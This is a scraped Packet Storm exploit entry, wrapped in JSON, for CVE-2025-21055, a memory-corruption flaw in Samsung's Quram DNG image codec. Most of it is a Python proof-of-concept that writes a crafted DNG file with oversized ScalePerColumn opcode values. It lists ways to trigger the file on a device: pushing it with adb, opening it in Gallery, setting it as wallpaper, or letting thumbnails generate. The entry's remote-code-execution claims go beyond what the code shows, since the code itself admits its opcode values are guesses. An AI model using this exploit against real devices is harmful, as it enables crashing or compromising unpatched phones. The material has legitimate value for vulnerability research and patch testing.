{“lastseen”:”2025-12-02T19:41:15″,”description”:”An out-of-bounds read\/write vulnerability in Samsung’s Quram image codec library libimagecodec.quram.so is triggered when the library processes a maliciously crafted image file, causing memory access outside the intended buffer boundaries…”,”published”:”2025-12-02T00:00:00″,”modified”:”2025-12-02T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Android\u202f13 Quram DNG Codec Memory Corruption”,”source”:””,”references”:””,”id”:”PACKETSTORM:212320″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-21055″],”sourceData”:”=============================================================================================================================================\\n | # Title : Android\u202f13 Quram DNG Codec Memory Corruption Vulnerability |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.samsung.com\/n_africa\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/211371\/ \\u0026 CVE-2025-21055 https:\/\/packetstorm.news\/download\/211371\\n \\n [+] Summary : \\n \\n CVE\u20112025\u201121055 is an Out\u2011of\u2011Bounds Read\/Write vulnerability in **Samsung\u2019s Quram image codec library** (`libimagecodec.quram.so`). \\n The flaw is triggered when the library processes a maliciously crafted image file, causing memory access outside the intended buffer boundaries.\\n Successful exploitation can result in **information disclosure**, **application crash**, or potentially **arbitrary code execution**, \\n depending on the attack scenario. The issue affects Samsung devices running vulnerable versions of the Quram codec **prior to the security update SMR October 2025 Release 1**.\\n Samsung addressed the vulnerability by releasing a patched version of the image codec library in the October 2025 Security Maintenance Release (SMR).\\n \\n [+] Vulnerability: Remote Code Execution in Samsung\u2019s libimagecodec.quram.so library.\\n \\n [+] Affected software: Samsung devices running Android 13 with firmware older than SMR Oct\u20112025 Release 1.\\n \\n [+] Impact: An attacker can exploit the vulnerability via specially crafted image files to execute arbitrary code on the device.\\n \\n [+] Affected devices: All Samsung devices using the vulnerable library version, including (but not limited to) Galaxy S22, S23, S24, Z Fold4, Z Flip4\u2014only if firmware is unpatched.\\n \\n [+] Patch\/Remediation: Apply the October 2025 SMR or later security update.\\n \\n [+] POC : python poc.py\\n \\n #!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Proof of Concept for CVE-2025-21055\\n Quram DNG Codec Memory Corruption Vulnerability\\n \\”\\”\\”\\n \\n import struct\\n import os\\n \\n def create_malicious_dng():\\n \\”\\”\\”\\n \u0625\u0646\u0634\u0627\u0621 \u0645\u0644\u0641 DNG \u0645\u0635\u0645\u0645 \u0644\u0625\u062b\u0627\u0631\u0629 \u0627\u0644\u062e\u0644\u0644 \u0641\u064a QuramDngOpcodeScalePerColumn\\n \\”\\”\\”\\n \\n # \u0647\u064a\u0643\u0644 \u0623\u0633\u0627\u0633\u064a \u0644\u0645\u0644\u0641 DNG \u0645\u0639 opcodes \u0645\u062e\u0635\u0635\u0629\\n dng_data = bytearray()\\n \\n # TIFF Header (\u0645\u0637\u0644\u0648\u0628 \u0644\u0645\u0644\u0641\u0627\u062a DNG)\\n dng_data.extend(b’II*\\\\x00′) # Little-endian TIFF\\n dng_data.extend(struct.pack(‘\\u003cI’, 8)) # Offset to IFD0\\n \\n # IFD0 – Basic tags\\n ifd0_data = bytearray()\\n ifd0_data.extend(struct.pack(‘\\u003cH’, 11)) # Number of entries\\n \\n # ImageWidth (\u0645\u0637\u0644\u0648\u0628) – Tag 256, Type=LONG (4), Count=1, Value=100\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 256, 4, 1))\\n ifd0_data.extend(struct.pack(‘\\u003cI’, 100))\\n \\n # ImageLength (\u0645\u0637\u0644\u0648\u0628) – Tag 257, Type=LONG (4), Count=1, Value=100 \\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 257, 4, 1))\\n ifd0_data.extend(struct.pack(‘\\u003cI’, 100))\\n \\n # BitsPerSample – Tag 258, Type=SHORT (3), Count=3\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 258, 3, 3))\\n bits_per_sample_offset = len(dng_data) + len(ifd0_data) + 4\\n ifd0_data.extend(struct.pack(‘\\u003cI’, bits_per_sample_offset))\\n \\n # Compression – Tag 259, Type=SHORT (3), Count=1, Value=1 (No compression)\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 259, 3, 1))\\n ifd0_data.extend(struct.pack(‘\\u003cH’, 1)) # Value in the offset field\\n ifd0_data.extend(b’\\\\x00\\\\x00′) # Padding\\n \\n # PhotometricInterpretation – Tag 262, Type=SHORT (3), Count=1, Value=32803 (CFA)\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 262, 3, 1))\\n ifd0_data.extend(struct.pack(‘\\u003cH’, 32803))\\n ifd0_data.extend(b’\\\\x00\\\\x00′) # Padding\\n \\n # Make DNG-specific tags\\n # DNGVersion – Tag 50706, Type=BYTE (1), Count=4, Value=[1,0,0,0]\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 50706, 1, 4))\\n dng_version_offset = len(dng_data) + len(ifd0_data) + 4\\n ifd0_data.extend(struct.pack(‘\\u003cI’, dng_version_offset))\\n \\n # DNGBackwardVersion – Tag 50707, Type=BYTE (1), Count=4, Value=[1,0,0,0]\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 50707, 1, 4))\\n dng_backward_offset = len(dng_data) + len(ifd0_data) + 4\\n ifd0_data.extend(struct.pack(‘\\u003cI’, dng_backward_offset))\\n \\n # OpcodeList1 – \u0627\u0644\u0646\u0642\u0637\u0629 \u0627\u0644\u062d\u0631\u062c\u0629 \u0644\u0644\u0647\u062c\u0648\u0645 – Tag 51008\\n opcode_list = create_malicious_opcodes()\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 51008, 1, len(opcode_list)))\\n opcode_list_offset = len(dng_data) + len(ifd0_data) + 4\\n ifd0_data.extend(struct.pack(‘\\u003cI’, opcode_list_offset))\\n \\n # CFAPattern – Tag 33421, Type=BYTE (1), Count=4\\n ifd0_data.extend(struct.pack(‘\\u003cHHI’, 33421, 1, 4))\\n cfa_pattern_offset = len(dng_data) + len(ifd0_data) + 4\\n ifd0_data.extend(struct.pack(‘\\u003cI’, cfa_pattern_offset))\\n \\n # \u0646\u0645\u0648\u0630\u062c CFA \u0628\u0633\u064a\u0637 – RGGB\\n cfa_pattern = b’\\\\x00\\\\x01\\\\x01\\\\x02’\\n \\n # \u0625\u0636\u0627\u0641\u0629 \u0628\u064a\u0627\u0646\u0627\u062a \u0625\u0636\u0627\u0641\u064a\u0629\\n ifd0_data.extend(struct.pack(‘\\u003cI’, 0)) # Offset to next IFD\\n \\n # \u062f\u0645\u062c \u0643\u0644 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\\n dng_data.extend(ifd0_data)\\n \\n # \u0625\u0636\u0627\u0641\u0629 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0627\u0644\u0645\u0631\u062c\u0639\u064a\u0629\\n # BitsPerSample data\\n dng_data.extend(struct.pack(‘\\u003cHHH’, 16, 16, 16))\\n \\n # DNGVersion data\\n dng_data.extend(b’\\\\x01\\\\x00\\\\x00\\\\x00′)\\n \\n # DNGBackwardVersion data \\n dng_data.extend(b’\\\\x01\\\\x00\\\\x00\\\\x00′)\\n \\n # CFA Pattern data\\n dng_data.extend(cfa_pattern)\\n \\n # \u0625\u0636\u0627\u0641\u0629 OpcodeList \u0641\u064a \u0627\u0644\u0645\u0648\u0636\u0639 \u0627\u0644\u0635\u062d\u064a\u062d\\n opcode_pos = opcode_list_offset – len(dng_data)\\n if opcode_pos \\u003c 0:\\n # \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0648\u0642\u0639 \u0633\u0627\u0644\u0628\u0627\u064b\u060c \u0646\u0636\u064a\u0641 padding\\n padding_needed = -opcode_pos\\n dng_data.extend(b’\\\\x00′ * padding_needed)\\n dng_data.extend(opcode_list)\\n else:\\n # \u0625\u0630\u0627 \u0643\u0627\u0646 \u0627\u0644\u0645\u0648\u0642\u0639 \u0645\u0648\u062c\u0628\u0627\u064b\u060c \u0646\u0636\u064a\u0641 \u0641\u064a \u0627\u0644\u0645\u0648\u0636\u0639 \u0627\u0644\u0645\u062d\u062f\u062f\\n if len(dng_data) \\u003c opcode_list_offset:\\n dng_data.extend(b’\\\\x00′ * (opcode_list_offset – len(dng_data)))\\n dng_data.extend(opcode_list)\\n \\n return bytes(dng_data)\\n \\n def create_malicious_opcodes():\\n \\”\\”\\”\\n \u0625\u0646\u0634\u0627\u0621 opcodes \u0645\u0635\u0645\u0645\u0629 \u0644\u0625\u062b\u0627\u0631\u0629 \u0627\u0644\u062e\u0644\u0644 \u0641\u064a ScalePerColumn\\n \\”\\”\\”\\n opcodes = bytearray()\\n \\n # Opcode ID \u0644\u0640 ScalePerColumn (\u0642\u064a\u0645\u0629 \u0627\u0641\u062a\u0631\u0627\u0636\u064a\u0629 – \u062a\u062d\u062a\u0627\u062c \u0627\u0644\u062a\u062d\u0642\u0642)\\n scale_per_column_id = 0x0000000A\\n \\n # Version\\n opcodes.extend(struct.pack(‘\\u003cI’, 1))\\n \\n # \u0625\u062d\u062f\u0627\u062b\u064a\u0627\u062a \u0627\u0644\u0645\u0646\u0637\u0642\u0629 – \u0642\u064a\u0645 \u0645\u0635\u0645\u0645\u0629 \u0644\u0625\u062b\u0627\u0631\u0629 integer overflow\\n # \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0642\u064a\u0645 \u0643\u0628\u064a\u0631\u0629 \u0644\u0625\u062b\u0627\u0631\u0629 \u0627\u0644\u0641\u0627\u0626\u0636 \u0641\u064a \u0627\u0644\u062d\u0633\u0627\u0628\u0627\u062a\\n top = 0x00000000\\n left = 0x00000000 \\n bottom = 0xFFFFFFFF # \u0642\u064a\u0645\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b\\n right = 0xFFFFFFFF # \u0642\u064a\u0645\u0629 \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b\\n \\n opcodes.extend(struct.pack(‘\\u003cIIII’, top, left, bottom, right))\\n \\n # \u0639\u062f\u062f \u0627\u0644\u0623\u0639\u0645\u062f\u0629 – \u0642\u064a\u0645\u0629 \u063a\u064a\u0631 \u0637\u0628\u064a\u0639\u064a\u0629\\n column_count = 0x7FFFFFFF # MAX_INT \u062a\u0642\u0631\u064a\u0628\u0627\u064b\\n opcodes.extend(struct.pack(‘\\u003cI’, column_count))\\n \\n # \u0645\u0639\u0627\u0645\u0644\u0627\u062a \u0627\u0644\u0642\u064a\u0627\u0633 – \u0642\u064a\u0645 \u0645\u0635\u0645\u0645\u0629 \u0644\u0625\u062b\u0627\u0631\u0629 \u0627\u0644\u062e\u0644\u0644 \u0641\u064a \u0627\u0644\u062d\u0633\u0627\u0628\u0627\u062a\\n # \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u0642\u064a\u0645 \u062a\u0624\u062f\u064a \u0625\u0644\u0649 \u0639\u0646\u0627\u0648\u064a\u0646 \u0630\u0627\u0643\u0631\u0629 \u063a\u064a\u0631 \u0635\u0627\u0644\u062d\u0629\\n for i in range(100): # \u0639\u062f\u062f \u0643\u0628\u064a\u0631 \u0645\u0646 \u0627\u0644\u0645\u0639\u0627\u0645\u0644\u0627\u062a\\n # \u0642\u064a\u0645 \u0645\u0635\u0645\u0645\u0629 \u0644\u0625\u0646\u0634\u0627\u0621 \u0639\u0646\u0648\u0627\u0646 \u0630\u0627\u0643\u0631\u0629 \u063a\u064a\u0631 \u0642\u0627\u0646\u0648\u0646\u064a\\n if i % 4 == 0:\\n factor = 0xB4000000 + (i * 0x1000) # \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0644\u0648\u0635\u0648\u0644 \u0644\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0643\u0631\u0627\u0634\\n else:\\n factor = 0x00000001 # \u0642\u064a\u0645 \u0639\u0627\u062f\u064a\u0629 \u0644\u062a\u062c\u0646\u0628 \u0627\u0644\u0627\u0643\u062a\u0634\u0627\u0641 \u0627\u0644\u0645\u0628\u0643\u0631\\n \\n opcodes.extend(struct.pack(‘\\u003cI’, factor \\u0026 0xFFFFFFFF))\\n \\n return opcodes\\n \\n def create_simplified_indoushka():\\n \\”\\”\\”\\n \u0646\u0633\u062e\u0629 \u0645\u0628\u0633\u0637\u0629 \u0645\u0646 \u0627\u0644\u0645\u0644\u0641 \u0627\u0644\u062e\u0628\u064a\u062b \u062a\u0631\u0643\u0632 \u0639\u0644\u0649 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u0623\u0633\u0627\u0633\u064a\\n \\”\\”\\”\\n dng_data = bytearray()\\n \\n # TIFF Header \u0628\u0633\u064a\u0637\\n dng_data.extend(b’II*\\\\x00\\\\x08\\\\x00\\\\x00\\\\x00′) # Header + offset to IFD\\n \\n # IFD \u0645\u0639 \u0639\u062f\u062f \u0642\u0644\u064a\u0644 \u0645\u0646 Tags\\n ifd_data = bytearray()\\n ifd_data.extend(struct.pack(‘\\u003cH’, 5)) # 5 entries\\n \\n # ImageWidth\\n ifd_data.extend(struct.pack(‘\\u003cHHI’, 256, 4, 1))\\n ifd_data.extend(struct.pack(‘\\u003cI’, 100))\\n \\n # ImageLength\\n ifd_data.extend(struct.pack(‘\\u003cHHI’, 257, 4, 1))\\n ifd_data.extend(struct.pack(‘\\u003cI’, 100))\\n \\n # Compression\\n ifd_data.extend(struct.pack(‘\\u003cHHI’, 259, 3, 1))\\n ifd_data.extend(struct.pack(‘\\u003cH’, 1))\\n ifd_data.extend(b’\\\\x00\\\\x00′)\\n \\n # PhotometricInterpretation (CFA)\\n ifd_data.extend(struct.pack(‘\\u003cHHI’, 262, 3, 1))\\n ifd_data.extend(struct.pack(‘\\u003cH’, 32803))\\n ifd_data.extend(b’\\\\x00\\\\x00′)\\n \\n # OpcodeList1 – \u0627\u0644\u062a\u0631\u0643\u064a\u0632 \u0639\u0644\u0649 \u0627\u0644\u062c\u0632\u0621 \u0627\u0644\u0645\u0647\u0645\\n ifd_data.extend(struct.pack(‘\\u003cHHI’, 51008, 1, 1000)) # \u062d\u062c\u0645 \u0643\u0628\u064a\u0631\\n opcode_offset = len(dng_data) + len(ifd_data) + 4\\n ifd_data.extend(struct.pack(‘\\u003cI’, opcode_offset))\\n \\n # No next IFD\\n ifd_data.extend(struct.pack(‘\\u003cI’, 0))\\n \\n dng_data.extend(ifd_data)\\n \\n # \u0625\u0636\u0627\u0641\u0629 opcodes \u062e\u0628\u064a\u062b\u0629\\n opcodes = bytearray()\\n opcodes.extend(struct.pack(‘\\u003cI’, 1)) # version\\n \\n # \u0625\u062d\u062f\u0627\u062b\u064a\u0627\u062a \u0643\u0628\u064a\u0631\u0629 \u062c\u062f\u0627\u064b\\n opcodes.extend(struct.pack(‘\\u003cIIII’, 0, 0, 0x7FFFFFFF, 0x7FFFFFFF))\\n \\n # \u0645\u0639\u0627\u0645\u0644\u0627\u062a \u0642\u064a\u0627\u0633 \u0645\u0635\u0645\u0645\u0629 \u0644\u0644\u062a\u0633\u0628\u0628 \u0641\u064a memory corruption\\n for i in range(200):\\n if i == 50: # \u0641\u064a \u0645\u0646\u062a\u0635\u0641 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a\u060c \u0646\u0636\u064a\u0641 \u0627\u0644\u0642\u064a\u0645 \u0627\u0644\u062e\u0628\u064a\u062b\u0629\\n opcodes.extend(struct.pack(‘\\u003cI’, 0xB4000079))\\n opcodes.extend(struct.pack(‘\\u003cI’, 0x2607A000))\\n else:\\n opcodes.extend(struct.pack(‘\\u003cI’, i))\\n \\n # \u062a\u0623\u0643\u062f \u0645\u0646 \u0623\u0646 \u0627\u0644\u0628\u064a\u0627\u0646\u0627\u062a \u0641\u064a \u0627\u0644\u0645\u0648\u0636\u0639 \u0627\u0644\u0635\u062d\u064a\u062d\\n if len(dng_data) \\u003c opcode_offset:\\n dng_data.extend(b’\\\\x00′ * (opcode_offset – len(dng_data)))\\n \\n dng_data.extend(opcodes)\\n \\n return bytes(dng_data)\\n \\n def indoushka_via_gallery(file_path):\\n \\”\\”\\”\\n \u0645\u062d\u0627\u0648\u0644\u0629 \u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0627\u0644\u062b\u063a\u0631\u0629 \u0639\u0628\u0631 \u0645\u0639\u0627\u0644\u062c\u0629 \u0627\u0644\u0645\u0644\u0641 \u0641\u064a \u0627\u0644\u062c\u0627\u0644\u064a\u0631\u064a\\n \\”\\”\\”\\n print(f\\”[+] Creating malicious DNG file: {file_path}\\”)\\n \\n try:\\n # \u0645\u062d\u0627\u0648\u0644\u0629 \u0625\u0646\u0634\u0627\u0621 \u0627\u0644\u0645\u0644\u0641 \u0628\u0627\u0644\u0637\u0631\u064a\u0642\u0629 \u0627\u0644\u0645\u0639\u0642\u062f\u0629 \u0623\u0648\u0644\u0627\u064b\\n malicious_dng = create_malicious_dng()\\n print(\\”[+] Complex DNG created successfully\\”)\\n except Exception as e:\\n print(f\\”[-] Complex method failed: {e}\\”)\\n print(\\”[+] Trying simplified method…\\”)\\n malicious_dng = create_simplified_indoushka()\\n print(\\”[+] Simplified DNG created successfully\\”)\\n \\n with open(file_path, ‘wb’) as f:\\n f.write(malicious_dng)\\n \\n file_size = os.path.getsize(file_path)\\n print(f\\”[+] Malicious DNG file created: {file_path} ({file_size} bytes)\\”)\\n \\n print(\\”\\\\n[+] Trigger methods:\\”)\\n print(\\” 1. Copy file to device: adb push indoushka.dng \/sdcard\/Download\/\\”)\\n print(\\” 2. Open file in Samsung Gallery\\”)\\n print(\\” 3. Use ‘Set as wallpaper’ feature\\”) \\n print(\\” 4. Share the image to Gallery\\”)\\n print(\\” 5. Wait for automatic thumbnail generation\\”)\\n \\n def analyze_crash():\\n \\”\\”\\”\\n \u062a\u062d\u0644\u064a\u0644 \u0645\u0639\u0644\u0648\u0645\u0627\u062a \u0627\u0644\u0643\u0631\u0627\u0634 \u0645\u0646 \u0627\u0644\u0633\u062c\u0644 \u0627\u0644\u0645\u0631\u0641\u0642\\n \\”\\”\\”\\n print(\\”\\\\n[!] Crash Analysis:\\”)\\n print(\\” – Fault address: 0xb40000792607a000 (non-canonical ARM64 address)\\”)\\n print(\\” – Crash in: QuramDngOpcodeScalePerColumn::processArea()\\”)\\n print(\\” – Likely cause: Integer overflow in memory calculation\\”)\\n print(\\” – Attack vector: Malicious ScalePerColumn opcode in DNG\\”)\\n \\n if __name__ == \\”__main__\\”:\\n print(\\”CVE-2025-21055 – Quram DNG Codec PoC\\”)\\n print(\\”=====================================\\”)\\n \\n output_file = \\”indoushka.dng\\”\\n \\n analyze_crash()\\n indoushka_via_gallery(output_file)\\n \\n print(f\\”\\\\n[!] PoC file ‘{output_file}’ generated successfully\\”)\\n print(\\”[!] Test on isolated device only!\\”)\\n print(\\”[!] Actual exploitation requires precise opcode values from reverse engineering\\”)\\n \\t\\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/212320″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/212320\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-02T19:41:15″,”description”:”An out-of-bounds read\/write vulnerability in Samsung’s Quram image codec library libimagecodec.quram.so is triggered when the library processes a maliciously crafted image file, causing memory access…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-28305","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n